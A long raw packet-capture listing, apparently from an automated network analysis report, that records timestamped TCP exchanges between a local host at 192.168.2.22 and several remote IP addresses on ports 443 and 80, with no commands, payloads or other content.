                                                                                                                                                                                              Oct 8, 2024 15:37:31.319401026 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.319417000 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.386430025 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.386461020 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.386499882 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.386511087 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.386516094 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.396821976 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.396847010 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.396933079 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.396933079 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.396941900 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.397660971 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.397684097 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.397715092 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.397722006 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.397788048 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.398224115 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.398243904 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.398309946 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.398309946 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.398319006 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.398633003 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.398658037 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.398703098 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.398703098 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.398710966 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.399019003 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.399034023 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.399096012 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.399105072 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.400685072 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.400710106 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.400739908 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.400746107 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.400758028 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.410525084 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.410547018 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.410625935 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.410625935 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.410636902 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.427274942 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.468012094 CEST49168443192.168.2.22188.114.97.3
                                                                                                                                                                                              Oct 8, 2024 15:37:31.468060970 CEST44349168188.114.97.3192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.470274925 CEST49168443192.168.2.22188.114.97.3
                                                                                                                                                                                              Oct 8, 2024 15:37:31.474329948 CEST49169443192.168.2.22188.114.97.3
                                                                                                                                                                                              Oct 8, 2024 15:37:31.474365950 CEST44349169188.114.97.3192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.475215912 CEST49169443192.168.2.22188.114.97.3
                                                                                                                                                                                              Oct 8, 2024 15:37:31.477484941 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.477514029 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.477617979 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.477632046 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.477638006 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.477638006 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.487896919 CEST4917080192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:31.487983942 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.488012075 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.488038063 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.488045931 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.488502979 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.489262104 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.489290953 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.489330053 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.489336014 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.489353895 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.489372969 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.489397049 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.489427090 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.489427090 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.489427090 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.489432096 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.489509106 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.489531994 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.489553928 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.489553928 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.489562035 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.489626884 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.489626884 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.490313053 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.490339041 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.490405083 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.490405083 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.490411043 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.490638018 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.491803885 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.491830111 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.491877079 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.491877079 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.491882086 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.493299007 CEST804917038.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.493551016 CEST4917080192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:31.502368927 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.502440929 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.502441883 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.502460003 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.502495050 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.567790985 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.569590092 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.569623947 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.569674969 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.569674969 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.569681883 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.569752932 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.579849005 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.579880953 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.579922915 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.579937935 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.580029964 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.580451012 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.580481052 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.580543995 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.580543995 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.580549955 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.580965042 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.580986023 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.581013918 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.581021070 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.581027031 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.581238031 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.581665993 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.581691980 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.581717968 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.581723928 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.581767082 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.582878113 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.582900047 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.582986116 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.582986116 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.582990885 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.584079981 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.584108114 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.584137917 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.584144115 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.584156990 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.584264040 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.591080904 CEST49168443192.168.2.22188.114.97.3
                                                                                                                                                                                              Oct 8, 2024 15:37:31.591094017 CEST44349168188.114.97.3192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.591516972 CEST49169443192.168.2.22188.114.97.3
                                                                                                                                                                                              Oct 8, 2024 15:37:31.591533899 CEST44349169188.114.97.3192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.593790054 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.593816042 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.593846083 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.593851089 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.593859911 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.659670115 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.659703970 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.659773111 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.659781933 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.659809113 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.659809113 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.670469046 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.670500994 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.670535088 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.670546055 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.670578003 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.670926094 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.670959949 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.671006918 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.671006918 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.671015024 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.672352076 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.672378063 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.672420979 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.672420979 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.672427893 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.672826052 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.672856092 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.672971010 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.672971010 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.672976017 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.673156977 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.673182011 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.673214912 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.673221111 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.673232079 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.674118042 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.674149990 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.674204111 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.674204111 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.674210072 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.684250116 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.684278011 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.684350967 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.684350967 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.684360027 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.750744104 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.750771046 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.750844955 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.750844955 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.750858068 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.758295059 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.761931896 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.761954069 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.762005091 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.762012005 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.762048960 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.762048960 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.762254000 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.762280941 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.762310982 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.762310982 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.762320042 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.762334108 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.762424946 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.763638973 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.763659954 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.763725042 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.763725042 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.763731003 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.763959885 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.763986111 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.764023066 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.764023066 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.764031887 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.764441967 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.764461994 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.764482021 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.764487028 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.764508009 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.765110016 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.765136957 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.765186071 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.765186071 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.765192986 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.775620937 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.775680065 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.775688887 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.775722980 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.775764942 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.799411058 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.841907978 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.841945887 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.842097044 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.842097044 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.842108011 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.852925062 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.852967024 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.852988958 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.852996111 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.853354931 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.853584051 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.853604078 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.853631020 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.853636026 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.853813887 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.855117083 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.855144024 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.855161905 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.855176926 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.855181932 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.855300903 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.855320930 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.855338097 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.855341911 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.855360031 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.855916023 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.855942011 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.855962038 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.855967045 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.855986118 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.855986118 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.857645035 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.857666016 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.857692957 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.857697964 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.857738018 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.867065907 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.867098093 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.867125034 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.867130995 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.867142916 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.867197990 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.871639967 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.932964087 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.932996035 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.933029890 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.933036089 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.933090925 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.933090925 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.943834066 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.943856955 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.943911076 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:31.943911076 CEST49166443192.168.2.22207.241.227.242
